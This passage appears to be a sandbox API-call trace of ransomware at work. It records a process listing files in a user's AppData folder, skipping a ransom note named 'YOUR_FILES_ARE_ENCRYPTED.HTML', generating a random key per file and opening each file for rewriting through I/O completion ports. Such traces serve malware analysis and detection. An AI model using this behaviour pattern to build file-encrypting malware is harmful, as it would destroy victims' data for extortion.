param_1=0x19ea02, param_2="%02X" | out: param_1="65") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="BA") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="C5") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="0B") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="0E") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="56") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="2E") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="FE") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="E4") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="B3") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="34") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="0F") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="F1") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="53") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D9") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="22") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="BA") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="62") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="DD") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="B6") returned 2 [0123.375] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="F8") returned 2 [0123.376] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="C1") returned 2 [0123.376] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="2C") returned 2 [0123.376] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="C1") returned 2 [0123.376] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="70") returned 2 [0123.376] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\mwhRadXni-2S9.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\mwhRadXni-2S9.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\mwhRadXni-2S9.mp4" [0123.376] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.376] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.376] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb54300, ftCreationTime.dwHighDateTime=0x1d700e4, ftLastAccessTime.dwLowDateTime=0xc9d03130, ftLastAccessTime.dwHighDateTime=0x1d709a4, ftLastWriteTime.dwLowDateTime=0xc9d03130, ftLastWriteTime.dwHighDateTime=0x1d709a4, nFileSizeHigh=0x0, nFileSizeLow=0x19b3, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="NHBExeU0CcG5t.mkv", cAlternateFileName="NHBEXE~1.MKV")) returned 1 [0123.376] StrStrIW (lpFirst="NHBExeU0CcG5t.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.376] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NHBExeU0CcG5t.mkv") returned 59 [0123.376] PathFindExtensionW (pszPath="NHBExeU0CcG5t.mkv") returned=".mkv" [0123.376] lstrlenW (lpString=".mkv") returned 4 [0123.376] PathFindExtensionW (pszPath="NHBExeU0CcG5t.mkv") returned=".mkv" [0123.377] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x758b40a0, ftCreationTime.dwHighDateTime=0x1d701f3, ftLastAccessTime.dwLowDateTime=0xc1b8e920, ftLastAccessTime.dwHighDateTime=0x1d7066a, ftLastWriteTime.dwLowDateTime=0xc1b8e920, ftLastWriteTime.dwHighDateTime=0x1d7066a, nFileSizeHigh=0x0, nFileSizeLow=0xdbd9, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="njQ3QIqRhpG_kappvvMF.doc", cAlternateFileName="NJQ3QI~1.DOC")) returned 1 [0123.377] StrStrIW (lpFirst="njQ3QIqRhpG_kappvvMF.doc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.377] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\njQ3QIqRhpG_kappvvMF.doc") returned 66 [0123.377] PathFindExtensionW (pszPath="njQ3QIqRhpG_kappvvMF.doc") returned=".doc" [0123.377] lstrlenW (lpString=".doc") returned 4 [0123.377] PathFindExtensionW (pszPath="njQ3QIqRhpG_kappvvMF.doc") returned=".doc" [0123.377] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\njQ3QIqRhpG_kappvvMF.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\njq3qiqrhpg_kappvvmf.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.378] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=56281) returned 1 [0123.378] GetProcessHeap () returned 0x600000 [0123.378] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0123.381] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="E4") returned 2 [0123.381] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="B0") returned 2 [0123.381] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="E1") returned 2 [0123.381] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="CA") returned 2 [0123.381] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E8") returned 2 [0123.381] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="C3") returned 2 [0123.381] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="54") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="62") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="DE") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="7C") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="7E") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="2A") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="7C") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="D4") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="DE") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="14") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="B2") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="BD") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="EE") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="25") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="64") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="01") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="84") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="3A") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="B9") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="3A") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="5A") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="5E") returned 2 [0123.381] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="68") returned 2 [0123.382] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="25") returned 2 [0123.382] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="96") returned 2 [0123.382] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="12") returned 2 [0123.382] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\njQ3QIqRhpG_kappvvMF.doc" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\njQ3QIqRhpG_kappvvMF.doc") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\njQ3QIqRhpG_kappvvMF.doc" [0123.382] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.382] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0123.382] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c287ec0, ftCreationTime.dwHighDateTime=0x1d6fb5c, ftLastAccessTime.dwLowDateTime=0xfe32db70, ftLastAccessTime.dwHighDateTime=0x1d708ce, ftLastWriteTime.dwLowDateTime=0xfe32db70, ftLastWriteTime.dwHighDateTime=0x1d708ce, nFileSizeHigh=0x0, nFileSizeLow=0x13ade, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="O0EL1.avi", cAlternateFileName="")) returned 1 [0123.382] StrStrIW (lpFirst="O0EL1.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.382] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O0EL1.avi") returned 51 [0123.382] PathFindExtensionW (pszPath="O0EL1.avi") returned=".avi" [0123.382] lstrlenW (lpString=".avi") returned 4 [0123.382] PathFindExtensionW (pszPath="O0EL1.avi") returned=".avi" [0123.382] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O0EL1.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\o0el1.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.407] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=80606) returned 1 [0123.408] GetProcessHeap () returned 0x600000 [0123.408] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.410] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="5F") returned 2 [0123.410] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="7E") returned 2 [0123.410] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B4") returned 2 [0123.410] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="4A") returned 2 [0123.410] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="3C") returned 2 [0123.410] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F2") returned 2 [0123.410] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="FC") returned 2 [0123.410] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="14") returned 2 [0123.410] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="88") returned 2 [0123.410] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="87") returned 2 [0123.410] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="6E") returned 2 [0123.410] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="16") returned 2 [0123.410] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="08") returned 2 [0123.410] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="A1") returned 2 [0123.410] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="01") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="7F") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="64") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="F4") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="09") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="D9") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="2E") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9F") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="3E") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="26") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="AF") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="16") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="EC") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="59") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="40") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="29") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="4A") returned 2 [0123.411] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="19") returned 2 [0123.412] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O0EL1.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O0EL1.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O0EL1.avi" [0123.412] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.412] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.416] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddcb9760, ftCreationTime.dwHighDateTime=0x1d7050d, ftLastAccessTime.dwLowDateTime=0xeb2fe270, ftLastAccessTime.dwHighDateTime=0x1d707e8, ftLastWriteTime.dwLowDateTime=0xeb2fe270, ftLastWriteTime.dwHighDateTime=0x1d707e8, nFileSizeHigh=0x0, nFileSizeLow=0xe5d5, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="O652klizUa58.ppt", cAlternateFileName="O652KL~1.PPT")) returned 1 [0123.416] StrStrIW (lpFirst="O652klizUa58.ppt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.416] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O652klizUa58.ppt") returned 58 [0123.416] PathFindExtensionW (pszPath="O652klizUa58.ppt") returned=".ppt" [0123.416] lstrlenW (lpString=".ppt") returned 4 [0123.416] PathFindExtensionW (pszPath="O652klizUa58.ppt") returned=".ppt" [0123.416] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O652klizUa58.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\o652klizua58.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.418] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=58837) returned 1 [0123.418] GetProcessHeap () returned 0x600000 [0123.418] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.418] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="17") returned 2 [0123.418] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="A2") returned 2 [0123.418] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="76") returned 2 [0123.418] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="74") returned 2 [0123.418] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="96") returned 2 [0123.418] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="27") returned 2 [0123.418] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="32") returned 2 [0123.418] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="E6") returned 2 [0123.418] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="82") returned 2 [0123.418] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="7B") returned 2 [0123.418] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="DB") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="A6") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="CF") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="CB") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="37") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="6E") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="28") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="1A") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="1C") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="8B") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="C1") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="BA") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="EA") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="1F") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="08") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="16") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="32") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="52") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="39") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="43") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="67") returned 2 [0123.419] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="00") returned 2 [0123.420] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O652klizUa58.ppt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O652klizUa58.ppt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O652klizUa58.ppt" [0123.420] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.420] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.424] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4574250, ftCreationTime.dwHighDateTime=0x1d70098, ftLastAccessTime.dwLowDateTime=0xf3a70720, ftLastAccessTime.dwHighDateTime=0x1d70898, ftLastWriteTime.dwLowDateTime=0xf3a70720, ftLastWriteTime.dwHighDateTime=0x1d70898, nFileSizeHigh=0x0, nFileSizeLow=0x273d, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="O8Ti.jpg", cAlternateFileName="")) returned 1 [0123.424] StrStrIW (lpFirst="O8Ti.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.424] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O8Ti.jpg") returned 50 [0123.424] PathFindExtensionW (pszPath="O8Ti.jpg") returned=".jpg" [0123.424] lstrlenW (lpString=".jpg") returned 4 [0123.424] PathFindExtensionW (pszPath="O8Ti.jpg") returned=".jpg" [0123.424] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O8Ti.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\o8ti.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.425] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=10045) returned 1 [0123.426] GetProcessHeap () returned 0x600000 [0123.426] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.426] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="95") returned 2 [0123.426] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="A3") returned 2 [0123.426] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="D6") returned 2 [0123.426] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="5E") returned 2 [0123.426] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="41") returned 2 [0123.426] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="09") returned 2 [0123.427] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="4B") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="29") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="3E") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="A6") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="F5") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="70") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="0E") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="70") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="02") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="88") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="9A") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="D5") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="F7") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="DB") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="CA") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D6") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="07") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="CD") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="B2") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="E4") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="FB") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="DA") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="65") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="BB") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="E3") returned 2 [0123.427] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="45") returned 2 [0123.428] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O8Ti.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O8Ti.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\O8Ti.jpg" [0123.428] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.428] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.430] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x124fbd0, ftCreationTime.dwHighDateTime=0x1d6ffdb, ftLastAccessTime.dwLowDateTime=0xa1aac390, ftLastAccessTime.dwHighDateTime=0x1d70775, ftLastWriteTime.dwLowDateTime=0xa1aac390, ftLastWriteTime.dwHighDateTime=0x1d70775, nFileSizeHigh=0x0, nFileSizeLow=0xdb0e, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="oflD41b-F_FUwjogy5B.bmp", cAlternateFileName="OFLD41~1.BMP")) returned 1 [0123.430] StrStrIW (lpFirst="oflD41b-F_FUwjogy5B.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.431] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oflD41b-F_FUwjogy5B.bmp") returned 65 [0123.431] PathFindExtensionW (pszPath="oflD41b-F_FUwjogy5B.bmp") returned=".bmp" [0123.431] lstrlenW (lpString=".bmp") returned 4 [0123.431] PathFindExtensionW (pszPath="oflD41b-F_FUwjogy5B.bmp") returned=".bmp" [0123.431] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: 